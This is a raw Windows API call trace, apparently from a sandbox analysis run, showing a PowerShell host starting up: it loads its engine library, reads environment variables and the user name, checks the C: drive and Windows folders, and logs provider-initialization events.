	[0685.758] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x31a200, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0685.758] CoTaskMemFree (pv=0x31a200) 
	[0685.760] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0685.760] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d060, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0685.760] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d060, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0685.761] CoTaskMemAlloc (cb=0x804) returned 0x1b7cd590
	[0685.761] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b7cd590, nSize=0x12d868 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x12d868) returned 0x1
	[0685.761] CoTaskMemFree (pv=0x1b7cd590) 
	[0685.761] CoTaskMemAlloc (cb=0x204) returned 0x2a4bb0
	[0685.761] GetUserNameW (in: lpBuffer=0x2a4bb0, pcbBuffer=0x12d8a8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x12d8a8) returned 1
	[0685.761] CoTaskMemFree (pv=0x2a4bb0) 
	[0685.762] ReportEventW (hEventLog=0x1b890008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x33c28c8*="Environment", lpRawData=0x33c2658) returned 1
	[0685.763] CoTaskMemAlloc (cb=0x104) returned 0x31a200
	[0685.763] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x31a200, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0685.763] CoTaskMemFree (pv=0x31a200) 
	[0685.764] CoTaskMemAlloc (cb=0x104) returned 0x31a200
	[0685.764] GetEnvironmentVariableW (in: lpName="HOMEDRIVE", lpBuffer=0x31a200, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0685.765] CoTaskMemFree (pv=0x31a200) 
	[0685.765] CoTaskMemAlloc (cb=0x104) returned 0x31a200
	[0685.765] GetEnvironmentVariableW (in: lpName="HOMEPATH", lpBuffer=0x31a200, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b
	[0685.765] CoTaskMemFree (pv=0x31a200) 
	[0685.765] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", nBufferLength=0x105, lpBuffer=0x12d410, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d
	[0685.765] SetErrorMode (uMode=0x1) returned 0x1
	[0685.765] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz"), fInfoLevelId=0x0, lpFileInformation=0x12d620 | out: lpFileInformation=0x12d620*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0685.766] SetErrorMode (uMode=0x1) returned 0x1
	[0685.767] GetLogicalDrives () returned 0x4
	[0685.767] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x12d180, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0685.769] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0685.769] SetErrorMode (uMode=0x1) returned 0x1
	[0685.770] CoTaskMemAlloc (cb=0x68) returned 0x319140
	[0685.770] CoTaskMemAlloc (cb=0x68) returned 0x3190d0
	[0685.770] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x319140, nVolumeNameSize=0x32, lpVolumeSerialNumber=0x12d5f0, lpMaximumComponentLength=0x12d5ec, lpFileSystemFlags=0x12d5e8, lpFileSystemNameBuffer=0x3190d0, nFileSystemNameSize=0x32 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x12d5f0*=0x9c354b42, lpMaximumComponentLength=0x12d5ec*=0xff, lpFileSystemFlags=0x12d5e8*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1
	[0685.770] CoTaskMemFree (pv=0x319140) 
	[0685.770] CoTaskMemFree (pv=0x3190d0) 
	[0685.770] SetErrorMode (uMode=0x1) returned 0x1
	[0685.770] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0685.771] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x12d330, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0685.772] SetErrorMode (uMode=0x1) returned 0x1
	[0685.772] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x12d590 | out: lpFileInformation=0x12d590*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0685.772] SetErrorMode (uMode=0x1) returned 0x1
	[0685.772] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x12d330, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0685.772] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x12d1e0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0685.772] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0685.773] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x12d110, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0685.773] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0685.774] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x12d160, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0685.774] SetErrorMode (uMode=0x1) returned 0x1
	[0685.774] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x12d3c0 | out: lpFileInformation=0x12d3c0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0685.774] SetErrorMode (uMode=0x1) returned 0x1
	[0685.774] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x12d160, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0685.774] SetErrorMode (uMode=0x1) returned 0x1
	[0685.774] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x12d3c0 | out: lpFileInformation=0x12d3c0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0685.774] SetErrorMode (uMode=0x1) returned 0x1
	[0685.775] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x12d200, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0685.775] SetErrorMode (uMode=0x1) returned 0x1
	[0685.775] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x12d460 | out: lpFileInformation=0x12d460*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0685.775] SetErrorMode (uMode=0x1) returned 0x1
	[0685.775] CoTaskMemAlloc (cb=0x804) returned 0x1b7cd590
	[0685.775] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b7cd590, nSize=0x12d868 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x12d868) returned 0x1
	[0685.776] CoTaskMemFree (pv=0x1b7cd590) 
	[0685.776] CoTaskMemAlloc (cb=0x204) returned 0x2a4bb0
	[0685.776] GetUserNameW (in: lpBuffer=0x2a4bb0, pcbBuffer=0x12d8a8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x12d8a8) returned 1
	[0685.776] CoTaskMemFree (pv=0x2a4bb0) 
	[0685.777] ReportEventW (hEventLog=0x1b890008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x33c99b8*="FileSystem", lpRawData=0x33c9748) returned 1
	[0685.778] CoTaskMemAlloc (cb=0x104) returned 0x31a200
	[0685.778] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x31a200, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0685.778] CoTaskMemFree (pv=0x31a200) 
	[0685.780] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d140, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0685.780] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0685.780] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0685.780] CoTaskMemAlloc (cb=0x804) returned 0x1b7cd590
	[0685.780] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b7cd590, nSize=0x12d868 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x12d868) returned 0x1
	[0685.781] CoTaskMemFree (pv=0x1b7cd590) 
	[0685.781] CoTaskMemAlloc (cb=0x204) returned 0x2a4bb0
	[0685.781] GetUserNameW (in: lpBuffer=0x2a4bb0, pcbBuffer=0x12d8a8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x12d8a8) returned 1
	[0685.781] CoTaskMemFree (pv=0x2a4bb0) 
	[0685.782] ReportEventW (hEventLog=0x1b890008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x33cf1f8*="Function", lpRawData=0x33cef88) returned 1
	[0685.785] CoTaskMemAlloc (cb=0x104) returned 0x31a200
	[0685.785] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x31a200, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0685.785] CoTaskMemFree (pv=0x31a200) 
	[0687.603] CoTaskMemAlloc (cb=0x804) returned 0x1b7cd590
	[0687.603] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b7cd590, nSize=0x12d868 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x12d868) returned 0x1
	[0689.385] CoTaskMemFree (pv=0x1b7cd590) 
	[0689.385] CoTaskMemAlloc (cb=0x204) returned 0x2a4bb0
	[0689.385] GetUserNameW (in: lpBuffer=0x2a4bb0, pcbBuffer=0x12d8a8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x12d8a8) returned 1
	[0689.385] CoTaskMemFree (pv=0x2a4bb0) 
	[0689.386] ReportEventW (hEventLog=0x1b890008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x33f1a20*="Registry", lpRawData=0x33f17b0) returned 1
	[0691.327] CoTaskMemAlloc (cb=0x804) returned 0x1b7cd590
	[0691.327] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b7cd590, nSize=0x12d868 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x12d868) returned 0x1
	[0691.327] CoTaskMemFree (pv=0x1b7cd590) 
	[0691.327] CoTaskMemAlloc (cb=0x204) returned 0x2a4bb0
	[0691.327] GetUserNameW (in: lpBuffer=0x2a4bb0, pcbBuffer=0x12d8a8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x12d8a8) returned 1
	[0691.328] CoTaskMemFree (pv=0x2a4bb0) 
	[0691.328] ReportEventW (hEventLog=0x1b890008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x33f6e38*="Variable", lpRawData=0x33f6bc8) returned 1
	[0691.364] CoTaskMemAlloc (cb=0x104) returned 0x31a200
	[0691.364] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x31a200, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0691.365] CoTaskMemFree (pv=0x31a200) 
	[0691.365] CoTaskMemAlloc (cb=0x104) returned 0x31a200
	[0691.365] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x31a200, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0691.365] CoTaskMemFree (pv=0x31a200) 
	[0691.390] CoTaskMemAlloc (cb=0x804) returned 0x1b7cd590
	[0691.390] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b7cd590, nSize=0x12d868 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x12d868) returned 0x1
	[0691.390] CoTaskMemFree (pv=0x1b7cd590) 
	[0691.390] CoTaskMemAlloc (cb=0x204) returned 0x2a4bb0
	[0691.390] GetUserNameW (in: lpBuffer=0x2a4bb0, pcbBuffer=0x12d8a8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x12d8a8) returned 1
	[0691.391] CoTaskMemFree (pv=0x2a4bb0) 
	[0691.391] ReportEventW (hEventLog=0x1b890008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x340aa50*="Certificate", lpRawData=0x340a7e0) returned 1
	[0691.396] CoTaskMemAlloc (cb=0x104) returned 0x31a200
	[0691.396] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x31a200, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0691.397] CoTaskMemFree (pv=0x31a200) 
	[0691.400] GetLogicalDrives () returned 0x4
	[0691.400] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x12d4f0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0691.400] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0691.401] CoTaskMemAlloc (cb=0x20e) returned 0x303380
	[0691.401] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x303380 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0691.402] CoTaskMemFree (pv=0x303380) 
	[0691.403] CoTaskMemAlloc (cb=0x104) returned 0x31a200
	[0691.403] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x31a200, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0691.403] CoTaskMemFree (pv=0x31a200) 
	[0691.403] CoTaskMemAlloc (cb=0x104) returned 0x31a200
	[0691.403] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x31a200, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0691.403] CoTaskMemFree (pv=0x31a200) 
	[0693.122] CoTaskMemAlloc (cb=0x104) returned 0x31a200
	[0693.122] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x31a200, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0693.122] CoTaskMemFree (pv=0x31a200) 
	[0693.126] CoTaskMemAlloc (cb=0x104) returned 0x31a200
	[0693.126] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x31a200, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0693.126] CoTaskMemFree (pv=0x31a200) 
	[0693.127] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x12d250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0693.127] SetErrorMode (uMode=0x1) returned 0x1
	[0693.127] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x12d4b0 | out: lpFileInformation=0x12d4b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0693.127] SetErrorMode (uMode=0x1) returned 0x1
	[0693.128] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x12d250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0693.128] SetErrorMode (uMode=0x1) returned 0x1
	[0693.128] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x12d4b0 | out: lpFileInformation=0x12d4b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0693.128] SetErrorMode (uMode=0x1) returned 0x1
	[0693.129] CoTaskMemAlloc (cb=0x104) returned 0x31a200
	[0693.129] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x31a200, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0693.129] CoTaskMemFree (pv=0x31a200) 
	[0693.137] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x12d3f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0693.138] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x12d260, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0693.138] SetErrorMode (uMode=0x1) returned 0x1
	[0693.138] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x12d470 | out: lpFileInformation=0x12d470*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0693.138] SetErrorMode (uMode=0x1) returned 0x1
	[0693.139] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x12d260, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0693.139] SetErrorMode (uMode=0x1) returned 0x1
	[0693.139] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x12d470 | out: lpFileInformation=0x12d470*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0693.139] SetErrorMode (uMode=0x1) returned 0x1
	[0693.139] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x12d270, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0693.139] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x12d160, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0693.139] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x12d260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0693.139] SetErrorMode (uMode=0x1) returned 0x1
	[0693.140] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x12d470 | out: lpFileInformation=0x12d470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0693.140] SetErrorMode (uMode=0x1) returned 0x1
	[0693.140] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x12d260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0693.140] SetErrorMode (uMode=0x1) returned 0x1
	[0693.140] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x12d470 | out: lpFileInformation=0x12d470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0693.140] SetErrorMode (uMode=0x1) returned 0x1
	[0693.140] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x12d270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0693.140] GetFullPathNameW (in: lpFileName="C:\\Windows\\.", nBufferLength=0x105, lpBuffer=0x12d160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0693.140] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x12d260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0693.141] SetErrorMode (uMode=0x1) returned 0x1
	[0693.141] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x12d470 | out: lpFileInformation=0x12d470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0693.141] SetErrorMode (uMode=0x1) returned 0x1
	[0693.141] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x12d260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0693.141] SetErrorMode (uMode=0x1) returned 0x1
	[0693.141] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x12d470 | out: lpFileInformation=0x12d470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0693.141] SetErrorMode (uMode=0x1) returned 0x1
	[0693.141] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x12d270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0693.141] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x105, lpBuffer=0x12d160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0693.142] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x12d2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0693.142] SetErrorMode (uMode=0x1) returned 0x1
	[0693.142] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x12d4b0 | out: lpFileInformation=0x12d4b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0693.142] SetErrorMode (uMode=0x1) returned 0x1
	[0693.142] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x12d2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0693.142] SetErrorMode (uMode=0x1) returned 0x1
